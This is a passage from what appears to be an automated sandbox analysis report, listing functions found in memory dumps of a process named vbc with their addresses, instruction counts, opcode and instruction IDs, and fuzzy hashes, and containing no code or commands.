                                                                                                                                                                                            • Instruction ID: 48dae857eda54ba6fcb19139c2d5b03d6d3ae96b9b36aaf10bc8e51e9892a09d
                                                                                                                                                                                            • Opcode Fuzzy Hash: a4b714d340cafa6e0a2be3b3dc38cc32b6fb8de8116b0eb3636154e74c9cd8f7
                                                                                                                                                                                            • Instruction Fuzzy Hash: 24018BB5A052088FDB08CBA8D4091DDBBF2EF82341F24416AD409AB220DA714906CF81
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 07367710 Relevance: .0, Instructions: 40COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.419256327.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7360000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 71727a22db9f979529facea6bdb12d15e14dc734ed8f086a7542e176f0fe496f
                                                                                                                                                                                            • Instruction ID: 0a9bbdfd0b57e56560a85a3ea63f09ca37d169b32ea5d47acd0ea3bf91218bef
                                                                                                                                                                                            • Opcode Fuzzy Hash: 71727a22db9f979529facea6bdb12d15e14dc734ed8f086a7542e176f0fe496f
                                                                                                                                                                                            • Instruction Fuzzy Hash: 5C01D1703193489FC7019B78D8188697FB7AF4620534484EAE944CB763DB35DD15CB51
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 07361F11 Relevance: .0, Instructions: 39COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.419256327.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7360000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 233a284bfe39391ac2847704fbebcc870b8206568931baaf4b4f212361495429
                                                                                                                                                                                            • Instruction ID: 175df112421ed13e755f1ccd6b39ad6325834d3c6ebe104d7d60e6fba7ec3c78
                                                                                                                                                                                            • Opcode Fuzzy Hash: 233a284bfe39391ac2847704fbebcc870b8206568931baaf4b4f212361495429
                                                                                                                                                                                            • Instruction Fuzzy Hash: E901E5B4D0525EDFDB00DFA4E5496EDBBF4FB09301F1081AAD909A7651D7340A51CF91
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0736D5E0 Relevance: .0, Instructions: 38COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.419256327.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7360000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: b55007325435ac1dc95ca4f6f0dca0beb6b44c4a891c82a394449f057481b58f
                                                                                                                                                                                            • Instruction ID: f0f1457c4aba1c10d428ed734996c0f5f3c50f56571de23ef08b7a8743f3acb9
                                                                                                                                                                                            • Opcode Fuzzy Hash: b55007325435ac1dc95ca4f6f0dca0beb6b44c4a891c82a394449f057481b58f
                                                                                                                                                                                            • Instruction Fuzzy Hash: A9016934300A098FC754CF29E58CC9AB7E6FF84215751C469E4098BB25DBB0FD06CBA0
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 07361F20 Relevance: .0, Instructions: 37COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.419256327.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7360000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 33fbab51d4cc70322fe5104e77ba3acb1d5048ba8b3d1069346ccd0bf5f2f1b6
                                                                                                                                                                                            • Instruction ID: 0ef3fb0e26c1b523289ed968a9f7be6ebf4c27b5568f91122fd9766594504f00
                                                                                                                                                                                            • Opcode Fuzzy Hash: 33fbab51d4cc70322fe5104e77ba3acb1d5048ba8b3d1069346ccd0bf5f2f1b6
                                                                                                                                                                                            • Instruction Fuzzy Hash: 2F0112B4D0520EDFDB00DFA8D5496AEBBF8FB09300F1082AAD919A3355E3340A40CF90
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 07361908 Relevance: .0, Instructions: 37COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.419256327.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7360000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: cd2a40abb8ad38a9e0f142b553922a37da6b8c45437fe58e3afe8e3d2ea16c01
                                                                                                                                                                                            • Instruction ID: 1687408a49b236f8bfe8c7eac50009c3dcfd392a55b6481e6a38a443e5c5b752
                                                                                                                                                                                            • Opcode Fuzzy Hash: cd2a40abb8ad38a9e0f142b553922a37da6b8c45437fe58e3afe8e3d2ea16c01
                                                                                                                                                                                            • Instruction Fuzzy Hash: 14F04672B00200DFE704CAA4DC54BAB73AEEFC8314F14442EE119D7391CB75AC058BA0
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 09F97AE9 Relevance: .0, Instructions: 36COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.425977503.0000000009F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F90000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9f90000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 86c19e0d9603b62cb84263f43c7e375cc5a4912bc6d5e3f7df2347bb35d627eb
                                                                                                                                                                                            • Instruction ID: 865bd9794f7b0f5da8ae130086cd8d1df0b1ebddf29d2179d7cb212766954bd3
                                                                                                                                                                                            • Opcode Fuzzy Hash: 86c19e0d9603b62cb84263f43c7e375cc5a4912bc6d5e3f7df2347bb35d627eb
                                                                                                                                                                                            • Instruction Fuzzy Hash: 37F027367153949FCB264770A8141EEBFB5EFC6390B0004BED402E3253DA329865C791
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 09F9DDB8 Relevance: .0, Instructions: 36COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.425977503.0000000009F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F90000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9f90000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 69ebc617bfbdff63bdd61bfd9ffebe82bd70cd11ca6cc38dc16be0a7048f457a
                                                                                                                                                                                            • Instruction ID: cbca83181c22bcb2f9fbe0c060221f270a43d0feb0b3267a623b2b67c952ac38
                                                                                                                                                                                            • Opcode Fuzzy Hash: 69ebc617bfbdff63bdd61bfd9ffebe82bd70cd11ca6cc38dc16be0a7048f457a
                                                                                                                                                                                            • Instruction Fuzzy Hash: C6F01435E042188BDF04DFAAE8146DDBBF9EB8D311F10912AE504B7340CB355944CBA4
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 05A3D040 Relevance: .0, Instructions: 36COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.418409526.0000000005A3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A3D000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_5a3d000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 03691cc861011d7eceb30fbb0a897e673e475ef69da37e2d1a4fc10fcf78d449
                                                                                                                                                                                            • Instruction ID: 7a6cfaebc61f3ae78150d34f6b2bf0a59f42ab07ddcec4889d4069e415b2a0e2
                                                                                                                                                                                            • Opcode Fuzzy Hash: 03691cc861011d7eceb30fbb0a897e673e475ef69da37e2d1a4fc10fcf78d449
                                                                                                                                                                                            • Instruction Fuzzy Hash: 26F0C271404384DFEB108B15CC84F66FFA8EB52678F18C49AED090F286C3799844CAB1
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 07361918 Relevance: .0, Instructions: 36COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.419256327.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7360000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 266ff3765029d8ae1b5756504d4e16094ac77e2907bb289ca4067a57eca02ad8
                                                                                                                                                                                            • Instruction ID: 2564c4b097f77fa9da4a4a576adb11dbc35a67920b2989807944e79e34167b30
                                                                                                                                                                                            • Opcode Fuzzy Hash: 266ff3765029d8ae1b5756504d4e16094ac77e2907bb289ca4067a57eca02ad8
                                                                                                                                                                                            • Instruction Fuzzy Hash: 98F05E727002196FD714CAA9DC45EABB7AEEBC8314F10493AE11AC7341DBB5AC4587A0
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0A00F4F0 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.426687603.000000000A000000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A000000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a000000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 22def727c2063c78257dd4487ae4476c11312831b6d72f913abe9bb7605791c0
                                                                                                                                                                                            • Instruction ID: 906f7918da68185f38776b716e8e8ecb92ee8a6bbc64f332315c14abe0934e7e
                                                                                                                                                                                            • Opcode Fuzzy Hash: 22def727c2063c78257dd4487ae4476c11312831b6d72f913abe9bb7605791c0
                                                                                                                                                                                            • Instruction Fuzzy Hash: 03F01DB2E00119ABCB45DF999C04AEEBBFAEFCC711F04802AE615E3240D7715A158B90
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 07361B68 Relevance: .0, Instructions: 34COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.419256327.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7360000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 1ab160beacadb4ba81d99895a7deb8b0cbd61c507bbcdbcfe2ad6eca3d0b2357
                                                                                                                                                                                            • Instruction ID: 4f0dc93339a9e24cf6abbf16d67e898bc4304d9904373e84593ba1e25eacd46e
                                                                                                                                                                                            • Opcode Fuzzy Hash: 1ab160beacadb4ba81d99895a7deb8b0cbd61c507bbcdbcfe2ad6eca3d0b2357
                                                                                                                                                                                            • Instruction Fuzzy Hash: D8F08CB53042048F9754DBA9E950966F3EAEFC8224314C56ED94EC3B80EF32EC028BC0
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 09F981C8 Relevance: .0, Instructions: 33COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.425977503.0000000009F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F90000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9f90000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 8a4c346db61fd5f1ac49a39ad8fc77a43f9dd43f9a87153554d1b54bb2e4c99e
                                                                                                                                                                                            • Instruction ID: 1b46f629a79cb1f0ca17494425e57fc7c363e1f9ee81c3918f6d99e4c916bca6
                                                                                                                                                                                            • Opcode Fuzzy Hash: 8a4c346db61fd5f1ac49a39ad8fc77a43f9dd43f9a87153554d1b54bb2e4c99e
                                                                                                                                                                                            • Instruction Fuzzy Hash: DFF027376489004FCB318758D890AE96B64DF933E4B5454BBE409DF311CA65880B8362
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 09F96280 Relevance: .0, Instructions: 33COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.425977503.0000000009F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F90000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9f90000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: b1d16eb7cd88c610a50bb866d5c63e232be444117586c1f37a7512fd9e30fbc9
                                                                                                                                                                                            • Instruction ID: 249788b205c91e9e5b7112ffa191f92dc3f063e610164a0567f1774d3d24eb4d
                                                                                                                                                                                            • Opcode Fuzzy Hash: b1d16eb7cd88c610a50bb866d5c63e232be444117586c1f37a7512fd9e30fbc9
                                                                                                                                                                                            • Instruction Fuzzy Hash: 52F0E935705294DFC712CBA8D591AEA7FF9EF89210F0084DAD049C7642DB31A840CB50
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0736C8F7 Relevance: .0, Instructions: 32COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.419256327.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7360000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 2f88de61f78d165b49688deefc9b3dc0e775391cb84ace8a453d6de4a8ec1c8c
                                                                                                                                                                                            • Instruction ID: 31880a10ea9e62710628e1f7ab5e416609c95cb78b9336da98ad280020ff2f99
                                                                                                                                                                                            • Opcode Fuzzy Hash: 2f88de61f78d165b49688deefc9b3dc0e775391cb84ace8a453d6de4a8ec1c8c
                                                                                                                                                                                            • Instruction Fuzzy Hash: ACF0A72120D2849FDB0517B6A45899ABF5ADFCB15475844FAE546C7613CE650C06C361
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0736CD68 Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.419256327.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7360000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: ed29f5b848e5e27b3b6d43a9a4e25116848bb73d77093429dd86bf18cb180fd9
                                                                                                                                                                                            • Instruction ID: 4a0d1f3073f2472e1b14e2b28701feff7c3e09c8847eaa1d19e88e2061eaa3f2
                                                                                                                                                                                            • Opcode Fuzzy Hash: ed29f5b848e5e27b3b6d43a9a4e25116848bb73d77093429dd86bf18cb180fd9
                                                                                                                                                                                            • Instruction Fuzzy Hash: 09F04474A022288FCB40EF69D8085DEBBF5FF88321F00452AD409E7300EB306A058BD5
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0736EC76 Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.419256327.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7360000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: cb07a326674de99d5213bd35d1f144deadb92ad815b24b6533af13f16ffda4a4
                                                                                                                                                                                            • Instruction ID: 67494593e7cf12a3a517fbba0ae1f4fe86aa4ceede66f5ef58acc412db544801
                                                                                                                                                                                            • Opcode Fuzzy Hash: cb07a326674de99d5213bd35d1f144deadb92ad815b24b6533af13f16ffda4a4
                                                                                                                                                                                            • Instruction Fuzzy Hash: 91F0A771B411044FD7149A29D848BBBFBA5EBC4320F10853AD40AC7390D7718844C790
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0736E955 Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.419256327.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7360000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: b4af5d752f0df2a4de0f1c1820c566e15aad4c29b8cad4e8a14625b1e87abc77
                                                                                                                                                                                            • Instruction ID: 397901c89b3e682d948530ca27d3287e499af0c46ff21c0a16c31a2917c87dc2
                                                                                                                                                                                            • Opcode Fuzzy Hash: b4af5d752f0df2a4de0f1c1820c566e15aad4c29b8cad4e8a14625b1e87abc77
                                                                                                                                                                                            • Instruction Fuzzy Hash: 3501F6B4A52219ABEF00DBA0DC58FEDBBB2BF49304F108005E911B72A4C7756944DF51
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 07368FF2 Relevance: .0, Instructions: 29COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.419256327.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7360000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: d945a78a8c651e5cc258b00a9c1240f588909a99cd24f33a354905ee8e92d393
                                                                                                                                                                                            • Instruction ID: 09db1f7445a73460b4861aec2f01ba8d22a8757b1230f74776a5fc81f656a5ea
                                                                                                                                                                                            • Opcode Fuzzy Hash: d945a78a8c651e5cc258b00a9c1240f588909a99cd24f33a354905ee8e92d393
                                                                                                                                                                                            • Instruction Fuzzy Hash: 0EE02B303053059B83155735A858A69376AAFC615430844BFC509CBA50EF31D84AC391
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 073694B8 Relevance: .0, Instructions: 29COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.419256327.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7360000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 6ce18ecf11ddb9082a3c13deacd9bcde66fc46065372f6d79ef73aefdf9eaccf
                                                                                                                                                                                            • Instruction ID: 7dbefb4c09808f7e5e48d7dd028f9c053873f2565d895916cdc5f4b3230bf5e4
                                                                                                                                                                                            • Opcode Fuzzy Hash: 6ce18ecf11ddb9082a3c13deacd9bcde66fc46065372f6d79ef73aefdf9eaccf
                                                                                                                                                                                            • Instruction Fuzzy Hash: 6FF0E93024D7554FC300DB38D99D84DBBE79E831553448CA9D0558BA52DB607C4DC7A2
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0736CF68 Relevance: .0, Instructions: 28COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.419256327.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7360000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 4fd548f4136d670e4c7e377b14646546d19e4eca0062b92eae407a42e0f432d9
                                                                                                                                                                                            • Instruction ID: acaeed634e4c60bc7023263496db0d13932d25371293b18b414b70f8fc7d9bbb
                                                                                                                                                                                            • Opcode Fuzzy Hash: 4fd548f4136d670e4c7e377b14646546d19e4eca0062b92eae407a42e0f432d9
                                                                                                                                                                                            • Instruction Fuzzy Hash: 62F0E5723026669FC3008F28D448C49B7AAAF85A20309825AE4488B722CF20FD41C7D0
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 07361D0F Relevance: .0, Instructions: 28COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.419256327.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7360000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: b5483028a137b56b2b0f7d2b0bbf8e22344045042b02b68c04598e0ab6282dff
                                                                                                                                                                                            • Instruction ID: 1bd4127e656a8d14e847cb9420e98bf933591771afe9061ea3d148ddd403a11a
                                                                                                                                                                                            • Opcode Fuzzy Hash: b5483028a137b56b2b0f7d2b0bbf8e22344045042b02b68c04598e0ab6282dff
                                                                                                                                                                                            • Instruction Fuzzy Hash: 53F05EB4E0424CAFD704DFB4E485B6EBBB4FB41700F1082AAD8459B386E7756911CF81
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 09F981D8 Relevance: .0, Instructions: 27COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.425977503.0000000009F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F90000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9f90000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 20cb4f40947fde08e2555b2e1119437594438fe1a19b5fcd0d8dbbd8f79669bd
                                                                                                                                                                                            • Instruction ID: 62fcd65120e4417378ab2f3404dc0f5229c7409288493c0c4cf327e73225d165
                                                                                                                                                                                            • Opcode Fuzzy Hash: 20cb4f40947fde08e2555b2e1119437594438fe1a19b5fcd0d8dbbd8f79669bd
                                                                                                                                                                                            • Instruction Fuzzy Hash: 64E0DF33A5491457DB30A749D885FAA6749DFA33E4F94947AE4088F310CE55884A83A2
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 09F9D788 Relevance: .0, Instructions: 27COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.425977503.0000000009F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F90000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9f90000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 85d8ebe9319586827059d42d0869c6122e4afd15486318aaaf454d5651210592
                                                                                                                                                                                            • Instruction ID: ef4a8d9c2a542849f09f533faf4f9a41668c4293b7b9d78a6f4f7040be1e5094
                                                                                                                                                                                            • Opcode Fuzzy Hash: 85d8ebe9319586827059d42d0869c6122e4afd15486318aaaf454d5651210592
                                                                                                                                                                                            • Instruction Fuzzy Hash: B7F0A03090A1899FCB15EFF4A5555EC7BB5EF43205B1445DAD044D7362C7321F09DB40
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 07364BF0 Relevance: .0, Instructions: 27COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.419256327.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7360000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: a840a1a039c8346cd60d8c3a1ed5f72a176f0d65dd38c4f042f893cbdf8faff8
                                                                                                                                                                                            • Instruction ID: 2f80b887ce254f9d06389d9c57eb9ecadc8f208ce69a4fba8d4485eedfe8ca42
